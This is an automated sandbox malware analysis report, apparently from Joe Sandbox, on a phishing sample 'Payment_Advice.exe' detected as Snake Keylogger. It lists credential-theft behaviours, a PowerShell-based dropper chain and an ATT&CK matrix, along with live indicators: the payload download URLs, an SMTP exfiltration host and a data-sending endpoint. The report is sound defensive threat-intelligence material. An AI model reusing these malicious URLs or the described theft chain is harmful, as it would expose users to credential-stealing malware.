            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00405594 GetVersionExW,GetVersionExW,2_2_00405594
            Source: C:\Users\user\Desktop\Payment_Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Temp\hadvices.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Temp\hadvices.scrFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Temp\hadvices.scrFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Windows\Temp\hadvices.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting            		Valid Accounts11
            Native API            		111
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory24
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)21
            Obfuscated Files or Information            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts4
            PowerShell            		Login HookLogin Hook1
            Software Packing            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets41
            Virtualization/Sandbox Evasion            		SSHKeylogging23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Masquerading            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1434636 Sample: Payment_Advice.exe Startdate: 01/05/2024 Architecture: WINDOWS Score: 100 51 mail.qoldenfrontier.com 2->51 53 checkip.dyndns.org 2->53 55 4 other IPs or domains 2->55 69 Snort IDS alert for network traffic 2->69 71 Multi AV Scanner detection for domain / URL 2->71 73 Found malware configuration 2->73 75 14 other signatures 2->75 12 Payment_Advice.exe 3 2->12         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 93 Injects a PE file into a foreign processes 12->93 18 Payment_Advice.exe 7 12->18         started        67 127.0.0.1 unknown unknown 15->67 signatures6 process7 file8 45 C:\Users\user\AppData\Local\Temp\...\9D55.vbs, data 18->45 dropped 21 wscript.exe 1 18->21         started        process9 signatures10 77 Suspicious powershell command line found 21->77 79 Wscript starts Powershell (via cmd or directly) 21->79 81 Bypasses PowerShell execution policy 21->81 83 2 other signatures 21->83 24 powershell.exe 17 19 21->24         started        process11 dnsIp12 63 advising-receipts.com 172.67.141.195, 443, 49704, 49705 CLOUDFLARENETUS United States 24->63 47 C:\Windows\Temp\hadvices.scr, PE32 24->47 dropped 49 C:\Users\Public\Payment_Advice.pdf, PDF 24->49 dropped 89 Drops PE files with a suspicious file extension 24->89 91 Powershell drops PE file 24->91 29 hadvices.scr 24->29         started        32 Acrobat.exe 20 75 24->32         started        34 conhost.exe 24->34         started        file13 signatures14 process15 signatures16 95 Multi AV Scanner detection for dropped file 29->95 97 Machine Learning detection for dropped file 29->97 99 Injects a PE file into a foreign processes 29->99 36 hadvices.scr 29->36         started        40 AcroCEF.exe 106 32->40         started        process17 dnsIp18 57 mail.qoldenfrontier.com 108.167.142.65, 49743, 49744, 49745 UNIFIEDLAYER-AS-1US United States 36->57 59 checkip.dyndns.com 193.122.130.0, 49720, 49728, 49730 ORACLE-BMC-31898US United States 36->59 61 2 other IPs or domains 36->61 85 Tries to steal Mail credentials (via file / registry access) 36->85 87 Tries to harvest and steal browser information (history, passwords, etc) 36->87 42 AcroCEF.exe 40->42         started        signatures19 process20 dnsIp21 65 23.56.12.145, 443, 49715 AKAMAI-ASUS United States 42->65

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment_Advice.exe29%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\Temp\hadvices.scr100%Joe Sandbox ML
            C:\Windows\Temp\hadvices.scr71%ReversingLabsWin32.Trojan.Negasteal
            C:\Windows\Temp\hadvices.scr35%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            reallyfreegeoip.org2%VirustotalBrowse
            mail.qoldenfrontier.com0%VirustotalBrowse
            scratchdreams.tk17%VirustotalBrowse
            advising-receipts.com13%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://go.mic0%URL Reputationsafe
            http://go.mic0%URL Reputationsafe
            https://www.adobe.co0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://advising-receipts.com/hsbc/hadvices.scr0%Avira URL Cloudsafe
            http://advising-receipts.com0%Avira URL Cloudsafe
            http://crl.ver)0%Avira URL Cloudsafe
            http://mail.qoldenfrontier.com100%Avira URL Cloudmalware
            https://advising-receipts.com0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/149.18.24.960%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/149.18.24.96$0%Avira URL Cloudsafe
            https://scratchdreams.tk100%Avira URL Cloudmalware
            https://advising-receipts.com10%VirustotalBrowse
            http://mail.qoldenfrontier.com0%VirustotalBrowse
            http://advising-receipts.com13%VirustotalBrowse
            https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
            https://scratchdreams.tk16%VirustotalBrowse
            https://advising-receipts.com/hsbc/Payment_Advice.pdf0%Avira URL Cloudsafe
            http://scratchdreams.tk100%Avira URL Cloudmalware
            https://scratchdreams.tk/_send_.php?TS16%VirustotalBrowse
            http://scratchdreams.tk17%VirustotalBrowse
            https://advising-receipts.com/hsbc/Payment_Advice.pdf2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            		172.67.177.134
            		truefalseunknown
            mail.qoldenfrontier.com
            		108.167.142.65
            		truetrueunknown
            scratchdreams.tk
            		172.67.169.18
            		truefalseunknown
            advising-receipts.com
            		172.67.141.195
            		truetrueunknown
            checkip.dyndns.com
            		193.122.130.0
            		truefalseunknown
            checkip.dyndns.org
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://advising-receipts.com/hsbc/hadvices.scrtrue
            • Avira URL Cloud: safe
            		unknown
            http://checkip.dyndns.org/false
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org/xml/149.18.24.96false
            • Avira URL Cloud: safe
            		unknown
            https://scratchdreams.tk/_send_.php?TSfalse
            • 16%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            https://advising-receipts.com/hsbc/Payment_Advice.pdftrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: malware
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://advising-receipts.compowershell.exe, 00000004.00000002.1386246749.000001B481ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B4815DD000.00000004.00000800.00020000.00000000.sdmpfalse
                • 13%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://go.micropowershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000008.00000003.1274341677.000001E16CA80000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                  		high
                  http://crl.ver)svchost.exe, 00000008.00000002.2455799913.000001E16CC00000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://checkip.dyndns.orghadvices.scr, 00000019.00000002.2455454438.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://go.micPayment_Advice.exe, 00000000.00000002.1196271509.000000000124D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://advising-receipts.compowershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B481761000.00000004.00000800.00020000.00000000.sdmptrue
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://mail.qoldenfrontier.comhadvices.scr, 00000019.00000002.2455454438.000000000345C000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003448000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000343E000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003430000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003452000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.adobe.coReaderMessages.6.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://g.live.com/odclientsettings/Prod1C:edb.log.8.drfalse
                      		high
                      https://reallyfreegeoip.org/xml/149.18.24.96$hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.org/qhadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://scratchdreams.tkhadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 16%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://reallyfreegeoip.orghadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000321A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://reallyfreegeoip.orghadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://checkip.dyndns.comhadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://scratchdreams.tkhadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 17%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            https://reallyfreegeoip.org/xml/hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.141.195
                            		advising-receipts.comUnited States
                            		13335CLOUDFLARENETUStrue
                            23.56.12.145
                            		unknownUnited States
                            		16625AKAMAI-ASUSfalse
                            172.67.169.18
                            		scratchdreams.tkUnited States
                            		13335CLOUDFLARENETUSfalse
                            108.167.142.65
                            		mail.qoldenfrontier.comUnited States
                            		46606UNIFIEDLAYER-AS-1UStrue
                            193.122.130.0
                            		checkip.dyndns.comUnited States
                            		31898ORACLE-BMC-31898USfalse
                            172.67.177.134
                            		reallyfreegeoip.orgUnited States
                            		13335CLOUDFLARENETUSfalse

                            Private

                            IP
                            127.0.0.1

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1434636
                            Start date and time:2024-05-01 15:16:11 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Payment_Advice.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winEXE@28/57@8/7
                            EGA Information:
                            • Successful, ratio: 80%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 119
                            • Number of non-executed functions: 39
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.59.24.185, 162.159.61.3, 172.64.41.3, 34.193.227.236, 54.144.73.197, 107.22.247.231, 18.207.85.246, 23.209.58.93, 23.207.202.196, 23.207.202.183, 23.207.202.187, 184.25.58.168, 184.25.58.138, 23.207.202.186, 23.45.233.26, 23.45.233.19, 23.45.233.9, 23.12.145.72, 23.12.145.69
                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net
                            • Execution Graph export aborted for target powershell.exe, PID 4912 because it is empty
                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            15:17:05API Interceptor50x Sleep call for process: powershell.exe modified
                            15:17:11API Interceptor2x Sleep call for process: svchost.exe modified
                            15:17:26API Interceptor38461x Sleep call for process: hadvices.scr modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            23.56.12.145evervendor.exeGet hashmaliciousNetSupport RATBrowse
                              172.67.169.18DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                  58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                      1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                        D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                          z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                            SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                              SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exeGet hashmaliciousSnake KeyloggerBrowse
                                                vessel details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  108.167.142.65Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    193.122.130.0SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                    • checkip.dyndns.org/
                                                    edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    iCareFone.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • checkip.dyndns.org/
                                                    D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    Quark Browser.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
